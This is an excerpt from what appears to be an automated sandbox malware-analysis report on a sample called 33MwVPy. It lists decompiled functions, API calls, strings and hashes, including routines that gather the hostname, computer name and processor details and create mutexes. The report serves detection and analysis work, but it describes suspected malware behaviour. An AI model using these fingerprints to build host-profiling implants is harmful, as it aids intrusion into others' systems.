                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandledstd::exception::exception$AllocateCurrentDebuggerException@8HeapPresentTerminateThrow_malloc
                                • String ID: 09l
                                • API String ID: 2175014196-2524447394
                                • Opcode ID: 0cd5a47aa2b06ce63ba1856b957d9ed85bd525a45eaa8cc9ed826eb072bee976
                                • Instruction ID: 197a532a8cd9b34ea844b1ae4d902bdbe1e4d0c9a69f1a4ef0d906dfa980ae73
                                • Opcode Fuzzy Hash: 0cd5a47aa2b06ce63ba1856b957d9ed85bd525a45eaa8cc9ed826eb072bee976
                                • Instruction Fuzzy Hash: 38416F797012899FCF40DF69C449A98BBBCBB0F318F10411AE81887B40F7B69945CF95
                                Function 6C2947B5 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 248COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 176 6c2947b5-6c2947e3 177 6c2947ea-6c29480f call 6c2f1f84 176->177 178 6c2947e5 176->178 181 6c294814-6c29481b 177->181 178->177 182 6c29482a-6c29482e 181->182 183 6c29481d-6c294828 181->183 185 6c294a8f-6c294a91 182->185 186 6c294834-6c29483a 182->186 184 6c29483f-6c294873 call 6c2f1f84 GetModuleFileNameA 183->184 196 6c29488d-6c294890 184->196 197 6c294875-6c294879 184->197 188 6c294ac0-6c294ac7 185->188 189 6c294a93-6c294a97 185->189 186->184 190 6c294ae9-6c294af9 call 6c2f1f75 188->190 191 6c294ac9-6c294ae6 call 6c2f1f84 call 6c2f28b7 188->191 189->190 193 6c294a99-6c294abe call 6c2f1f84 call 6c291814 189->193 191->190 193->190 200 6c294893-6c2948c0 call 6c2f1f84 call 6c2f24fa 196->200 201 6c294892 196->201 197->197 203 6c29487b 197->203 200->188 216 6c2948c6-6c2948f4 call 6c2f1f84 call 6c2f24fa 200->216 201->200 205 6c294883-6c29488b 203->205 205->196 210 6c29487d-6c294880 205->210 210->201 213 6c294882 210->213 213->205 216->188 221 6c2948fa 216->221 222 6c2948ff-6c294903 221->222 223 6c294941-6c29494a 222->223 224 6c294905-6c294908 222->224 223->222 226 6c29494c-6c294979 call 6c2f1f84 call 6c2f330e 223->226 224->223 225 6c29490a-6c29493b call 6c2f1f84 call 6c2f24fa 224->225 225->188 225->223 235 6c29497b-6c29497e 226->235 236 6c2949b7-6c2949c4 call 6c2f330e 226->236 235->236 238 6c294980-6c2949b1 call 6c2f1f84 call 6c2f24fa 235->238 242 6c294a02-6c294a0b call 6c2f330e 236->242 243 6c2949c6-6c2949c9 236->243 238->188 238->236 251 6c294a0d-6c294a10 242->251 252 6c294a45-6c294a6e call 6c2f1f84 call 6c2f24fa 242->252 243->242 245 6c2949cb-6c2949fc call 6c2f1f84 call 6c2f24fa 243->245 245->188 245->242 251->252 253 6c294a12-6c294a43 call 6c2f1f84 call 6c2f24fa 251->253 262 6c294a73-6c294a7a 252->262 253->188 253->252 262->188 264 6c294a7c-6c294a89 262->264 264->181 264->185
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: _sprintf$__wgetenv$FileModuleName
                                • String ID: %s%c%s$%s%s$%s.as$710$ASTR$ASTROLOG$C:\Astrolog$File '%s' not found.$r%s
                                • API String ID: 2614078948-576927601
                                • Opcode ID: a3ec6400418e8346a57ab94112efd49650ffc51c8b37a56108d847f235bd1268
                                • Instruction ID: db034d7d37e413917150c2a59bd615219f7d831e5117fbac2f0a63d22f2c5469
                                • Opcode Fuzzy Hash: a3ec6400418e8346a57ab94112efd49650ffc51c8b37a56108d847f235bd1268
                                • Instruction Fuzzy Hash: A991D6F684035D6BDB11DA51CD48FCBB3BCAB15319F5002D1EA69A3501EB74DAC98F60
                                Function 6C2B7CC1 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 536COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: _sprintf$_free$_strncmp
                                • String ID: .;C:\Astrolog\$99.$asteroid No. %d (%s): $asteroid eph. file (%s): $jd %f < lower limit %f;$jd %f > upper limit %f;$moon eph. file (%s): $plan. COB No. %d (%s): $plan. moon No. %d (%s): $planets eph. file (%s): $s.%s$se1
                                • API String ID: 1187704711-3796515
                                • Opcode ID: 20012735384ef661c093bf74ab501e35fb8b6de9f7b63f311842aeed653bc662
                                • Instruction ID: efe5d7a2bf714ebd12a072ee7d1d5fe5ddf8494045f7491c1ff2c27d467bea85
                                • Opcode Fuzzy Hash: 20012735384ef661c093bf74ab501e35fb8b6de9f7b63f311842aeed653bc662
                                • Instruction Fuzzy Hash: B412C371904A0ECBDB218F24D844BDA77F4FF4538DF2446DAEC9DA6940EB319A89CB50
                                Function 6C27338C Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 129memoryfilesynchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • __EH_prolog3_catch_GS.LIBCMT ref: 6C273393
                                • CreateMutexA.KERNEL32(00000000,00000000,MyProgramMutex,00000020), ref: 6C2733A1
                                • GetLastError.KERNEL32 ref: 6C2733B1
                                • __CxxThrowException@8.LIBCMT ref: 6C2733D1
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000334B,00000000,00000000,6C39A980), ref: 6C273433
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6C273451
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C3633F8), ref: 6C27345C
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6C3633F8), ref: 6C273477
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C3633F8), ref: 6C273484
                                • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C3633F8), ref: 6C273494
                                • _memmove.LIBCMT ref: 6C2734AC
                                • HeapCreate.KERNEL32(00040000,-000000C9,00000000), ref: 6C2734C5
                                  • Part of subcall function 6C2F2E33: _doexit.LIBCMT ref: 6C2F2E3F
                                • RtlAllocateHeap.NTDLL(00000000,00000008,-000000C9), ref: 6C2734CF
                                • _memmove.LIBCMT ref: 6C2734DC
                                • GetDC.USER32(00000000), ref: 6C2734E5
                                • EnumObjects.GDI32(00000000,00000002,00000000,00000000), ref: 6C2734F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: Create$File$CloseHeap_memmove$AllocateChangeEnumErrorException@8FindH_prolog3_catch_HandleLastMutexNotificationObjectsReadSizeThreadThrow_doexit
                                • String ID: 1wps$MyProgramMutex$_w8g
                                • API String ID: 235313284-2654228369
                                • Opcode ID: 6f6f1c6e47821186c53b1fe7360e5384219f4e776e928fb37fcf1f29dfb4bffb
                                • Instruction ID: 894f0f5e7001f7f4b57414c26b074f80f23f4ed5080f3ea7035505d5b2786ca7
                                • Opcode Fuzzy Hash: 6f6f1c6e47821186c53b1fe7360e5384219f4e776e928fb37fcf1f29dfb4bffb
                                • Instruction Fuzzy Hash: EB41B271A4021CBFDB116BB18C99EEF7EBDFB0A315F100564F951A3A40DB758D068AB0
                                Function 1000C1C0 Relevance: 33.1, APIs: 9, Strings: 9, Instructions: 1628networklibrarystringCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 1000C311
                                • gethostname.WS2_32(?,00000100), ref: 1000C339
                                • gethostbyname.WS2_32(?), ref: 1000C34F
                                  • Part of subcall function 1000BB20: gethostname.WS2_32(?,00000100), ref: 1000BB53
                                  • Part of subcall function 1000BB20: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 1000BB6F
                                  • Part of subcall function 1000BB20: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 1000BBB4
                                • LoadLibraryW.KERNEL32(10077444,10077566,00000000,10077568,10077568,10077566,00000000,00000000,00000000,-00000002,00000000,00000000), ref: 1000C83C
                                • FreeLibrary.KERNEL32(00000000), ref: 1000C885
                                  • Part of subcall function 1000C1C0: GetTickCount.KERNEL32 ref: 1000BD7C
                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000007,00000000,00000000,10077510,00000006), ref: 1000CED4
                                • lstrcpyW.KERNEL32(1008CE80,00000000), ref: 1000CF28
                                • wsprintfW.USER32 ref: 1000CF3F
                                • GetFileAttributesW.KERNEL32(?), ref: 1000CFE2
                                  • Part of subcall function 1001BC50: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000001,?), ref: 1001BC87
                                  • Part of subcall function 1001CBA0: GetComputerNameW.KERNEL32(?,00000200), ref: 1001CBF5
                                  • Part of subcall function 1001CBA0: lstrcpyW.KERNEL32(?,10077510), ref: 1001CC0B
                                  • Part of subcall function 1001CBA0: wsprintfW.USER32 ref: 1001CC37
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$Librarygethostnamelstrcpywsprintf$AttributesComputerCountFileFolderFreeLoadNamePathSpecialStartupTickgethostbyname
                                • String ID: ,$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Remark$SID$Time$l$long$x64$x86
                                • API String ID: 4242217452-1458297535
                                • Opcode ID: 55ff83a61d9db7206ae508621e76a6cffcc3e39af66de2d6fb2b3ad838857976
                                • Instruction ID: 9d0cd7843b54b44ededa8168ed05449c303563adff5c25b9c2a1c632e16138b0
                                • Opcode Fuzzy Hash: 55ff83a61d9db7206ae508621e76a6cffcc3e39af66de2d6fb2b3ad838857976
                                • Instruction Fuzzy Hash: 37E2D470D00A589AEB64CB24CC85BEEB772EF45346F1082D9E049A7296DB756FC4CF60
                                Function 6C27B1DE Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 108COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1242 6c27b1de-6c27b228 call 6c290908 call 6c2f1f84 * 2 1250 6c27b247-6c27b253 call 6c2f330e 1242->1250 1251 6c27b22a-6c27b22d 1242->1251 1259 6c27b255-6c27b258 1250->1259 1260 6c27b278-6c27b285 call 6c2f330e 1250->1260 1253 6c27b242-6c27b245 1251->1253 1254 6c27b22f-6c27b234 1251->1254 1253->1250 1255 6c27b238-6c27b23f 1253->1255 1254->1251 1257 6c27b236 1254->1257 1255->1250 1258 6c27b241 1255->1258 1257->1253 1258->1253 1259->1260 1261 6c27b25a-6c27b275 call 6c290908 call 6c2f1f84 1259->1261 1266 6c27b287-6c27b28a 1260->1266 1267 6c27b2aa-6c27b2b3 call 6c2f330e 1260->1267 1261->1260 1266->1267 1268 6c27b28c-6c27b2a7 call 6c290908 call 6c2f1f84 1266->1268 1275 6c27b2b5-6c27b2b8 1267->1275 1276 6c27b2d8-6c27b300 call 6c290908 call 6c2f1f84 call 6c2b6956 1267->1276 1268->1267 1275->1276 1278 6c27b2ba-6c27b2d5 call 6c290908 call 6c2f1f84 1275->1278 1289 6c27b305-6c27b31d call 6c2f1f75 1276->1289 1278->1276
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: _sprintf$__wgetenv$__output_l
                                • String ID: %s%s$7.10$ASTR$ASTROLOG$C:\Astrolog
                                • API String ID: 2520948663-3225433610
                                • Opcode ID: 50596498597506815a182b9504057e4f02cbd41331c3fb27d6cbd1d65e4bd9fd
                                • Instruction ID: faa7009b3d1e1cab262fa9147da89fbb5453aa4f7eb748b52186c33d5c4da443
                                • Opcode Fuzzy Hash: 50596498597506815a182b9504057e4f02cbd41331c3fb27d6cbd1d65e4bd9fd
                                • Instruction Fuzzy Hash: BB31C5B180269D9AFB10D6A5DC88FEE776C9F4230DF6005A1EC55EBA51EF308589CB70
                                Function 1001EE00 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 230registrylibraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1671 1001ee00-1001ef24 call 1003b910 * 3 LoadLibraryW RegOpenKeyExW 1683 1001ef34-1001ef3b 1671->1683 1684 1001ef26-1001ef2f 1671->1684 1685 1001f130-1001f144 call 1001f177 1683->1685 1686 1001ef41 1683->1686 1684->1685 1699 1001f146-1001f147 FreeLibrary 1685->1699 1700 1001f14d-1001f16a call 10038bd3 1685->1700 1686->1685 1688 1001f095-1001f0bb RegQueryValueExW 1686->1688 1689 1001efa4-1001efd1 1686->1689 1690 1001f037-1001f064 1686->1690 1691 1001ef48-1001ef75 RegQueryValueExW 1686->1691 1692 1001f0c8-1001f0f3 call 10039180 RegQueryValueExW 1688->1692 1693 1001f0bd-1001f0c6 1688->1693 1689->1685 1706 1001efd7-1001efdd 1689->1706 1690->1685 1703 1001f06a-1001f090 wsprintfW 1690->1703 1691->1685 1695 1001ef7b-1001ef81 call 1001ed90 1691->1695 1708 1001f0f5-1001f107 call 100391ac 1692->1708 1709 1001f109-1001f11d 1692->1709 1693->1685 1702 1001ef86-1001ef9f lstrcpyW 1695->1702 1699->1700 1702->1685 1703->1685 1710 1001efe3-1001efed 1706->1710 1713 1001f11f-1001f125 1708->1713 1709->1713 1711 1001f019-1001f032 lstrcpyW 1710->1711 1712 1001efef-1001effe 1710->1712 1711->1713 1717 1001f001-1001f00b 1712->1717 1713->1685 1718 1001f012-1001f017 1717->1718 1719 1001f00d-1001f010 1717->1719 1718->1710 1719->1717
                                APIs
                                • LoadLibraryW.KERNEL32(100782C8,?,?,?,?,?,10081068,00000001,Remark), ref: 1001EE9F
                                • RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,?,?,10081068,00000001,Remark), ref: 1001EF1C
                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,10081068,00000001,Remark), ref: 1001F147
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: Library$FreeLoadOpen
                                • String ID: Remark
                                • API String ID: 3518234908-3865500943
                                • Opcode ID: f0ac16730cc1bbeac4a56bd6364e2f2ca9246a11b390f576fc7b0e8c0857bdd6
                                • Instruction ID: 4280bcdcbe3d8e76b3a2d985dd6de93ce3b6678e1cecf0cba3b117d83fd6403a
                                • Opcode Fuzzy Hash: f0ac16730cc1bbeac4a56bd6364e2f2ca9246a11b390f576fc7b0e8c0857bdd6
                                • Instruction Fuzzy Hash: 5F913AB1D04228ABEB21DF64CC44BDEB7B9FB44714F0041EAEA4CA7251DB719E858F58
                                Function 6C27BCA4 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 207COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1720 6c27bca4-6c27bcaa 1721 6c27bd51-6c27bd63 1720->1721 1722 6c27bcb0-6c27bce2 1720->1722 1723 6c27bd66-6c27bd69 1721->1723 1724 6c27bce4-6c27bd0e call 6c2b9261 1722->1724 1725 6c27bd10 1722->1725 1726 6c27bd6d-6c27bd76 1723->1726 1728 6c27bd12-6c27bd18 1724->1728 1725->1728 1729 6c27bd7f-6c27bd82 1726->1729 1730 6c27bd78-6c27bd7a 1726->1730 1732 6c27bd31-6c27bd37 1728->1732 1733 6c27bd1a-6c27bd2b 1728->1733 1737 6c27bd84-6c27bd89 1729->1737 1738 6c27bd8b-6c27bd8e 1729->1738 1730->1729 1736 6c27bd7c-6c27bd7d 1730->1736 1734 6c27bd40-6c27bd46 1732->1734 1735 6c27bd39 1732->1735 1733->1732 1734->1723 1739 6c27bd48-6c27bd4f 1734->1739 1735->1734 1740 6c27bde5-6c27bdf3 call 6c2f1f84 1736->1740 1741 6c27bdd1-6c27bddc call 6c2f1f84 1737->1741 1742 6c27bd97-6c27bd9a 1738->1742 1743 6c27bd90-6c27bd95 1738->1743 1739->1723 1754 6c27bdf6-6c27be14 call 6c2c0679 1740->1754 1741->1754 1746 6c27bda3-6c27bda6 1742->1746 1747 6c27bd9c-6c27bda1 1742->1747 1743->1741 1748 6c27bdaf-6c27bdb2 1746->1748 1749 6c27bda8-6c27bdad 1746->1749 1747->1741 1752 6c27bdb4-6c27bdb9 1748->1752 1753 6c27bdbb-6c27bdbe 1748->1753 1749->1741 1752->1741 1755 6c27bdc7-6c27bdca 1753->1755 1756 6c27bdc0-6c27bdc5 1753->1756 1758 6c27be19-6c27be23 1754->1758 1759 6c27bdde 1755->1759 1760 6c27bdcc 1755->1760 1756->1741 1761 6c27bf55-6c27bf98 call 6c2c0847 1758->1761 1762 6c27be29-6c27be68 call 6c290b5b 1758->1762 1759->1740 1760->1741 1769 6c27bf9f-6c27bfa3 1761->1769 1767 6c27be85-6c27becf call 6c27862e 1762->1767 1768 6c27be6a-6c27be70 1762->1768 1776 6c27bed1-6c27bee1 1767->1776 1777 6c27bf1a 1767->1777 1768->1767 1770 6c27be72-6c27be7e 1768->1770 1772 6c27bd6b 1769->1772 1773 6c27bfa9-6c27bfb7 call 6c2f1f75 1769->1773 1770->1767 1772->1726 1776->1777 1780 6c27bee3-6c27bee9 1776->1780 1779 6c27bf21-6c27bf45 1777->1779 1781 6c27bf47 1779->1781 1782 6c27bf4c-6c27bf53 1779->1782 1783 6c27bef3 1780->1783 1784 6c27beeb-6c27bef1 1780->1784 1781->1782 1782->1769 1785 6c27bef9-6c27bf18 call 6c316d20 1783->1785 1784->1785 1785->1779
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: _sprintf
                                • String ID: ,M31$,beCru$,ze-1Ret$@$Alnilam$Kaus Australis$Pleione$Rigil Kentaurus
                                • API String ID: 1467051239-1042911856
                                • Opcode ID: 857572cf1cf52306351cf1274410e5c51dc55aac02aed5377e8b678b51de7272
                                • Instruction ID: 529a1de15e18496692981e50511ef5c1384c73fba10e20a78f753e5c2551bdfb
                                • Opcode Fuzzy Hash: 857572cf1cf52306351cf1274410e5c51dc55aac02aed5377e8b678b51de7272
                                • Instruction Fuzzy Hash: CF817C71A0451FDBCF20AF64E9C49DC7778FB0B305F8146EEE89952950EB318698CB61
                                Function 1000DBD0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 202stringsynchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1788 1000dbd0-1000dbef 1790 1000dbf1-1000dbf3 1788->1790 1791 1000dbf5-1000dc05 1788->1791 1792 1000dc1e-1000dc3d call 1001cba0 1790->1792 1794 1000dc0d-1000dc0f 1791->1794 1800 1000dcae-1000dcb5 1792->1800 1801 1000dc3f-1000dca3 call 100425aa call 1004287d call 1003b910 wsprintfW call 1001cae0 1792->1801 1796 1000dc11-1000dc16 1794->1796 1797 1000dc1c 1794->1797 1796->1797 1798 1000dc18-1000dc1a 1796->1798 1797->1792 1798->1792 1805 1000dcc4-1000dcdc CreateMutexW GetLastError 1800->1805 1806 1000dcb7-1000dcc2 1800->1806 1822 1000dca8 1801->1822 1808 1000dcf8-1000dd2e call 1003b910 GetComputerNameW 1805->1808 1809 1000dcde-1000dcf7 CloseHandle call 10038bd3 1805->1809 1806->1805 1818 1000dd30-1000dd3c lstrcpyW 1808->1818 1819 1000dd42-1000ddb0 call 1003b910 wsprintfW call 1001ee00 1808->1819 1818->1819 1826 1000ddb2-1000ddd5 call 1001ee00 1819->1826 1827 1000dddd-1000dde5 1819->1827 1822->1800 1831 1000ddda 1826->1831 1829 1000de07-1000de11 call 1001f9a0 call 1001cba0 1827->1829 1830 1000dde7-1000ddef 1827->1830 1839 1000de16-1000de1d 1829->1839 1830->1829 1832 1000ddf1-1000ddf6 1830->1832 1831->1827 1832->1829 1834 1000ddf8-1000de04 call 1003ae10 1832->1834 1834->1829 1841 1000de49-1000de5e call 10038bd3 1839->1841 1842 1000de1f-1000de30 call 100424b6 1839->1842 1842->1841 1847 1000de32-1000de34 1842->1847 1848 1000de36-1000de39 1847->1848 1849 1000de3b-1000de43 1847->1849 1848->1841 1848->1849 1849->1841
                                APIs
                                • wsprintfW.USER32 ref: 1000DC8F
                                • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 1000DCC9
                                • GetLastError.KERNEL32 ref: 1000DCD1
                                • CloseHandle.KERNEL32(00000000), ref: 1000DCDF
                                • GetComputerNameW.KERNEL32(?,00000200), ref: 1000DD26
                                • lstrcpyW.KERNEL32(?,10077510), ref: 1000DD3C
                                • wsprintfW.USER32 ref: 1000DD68
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
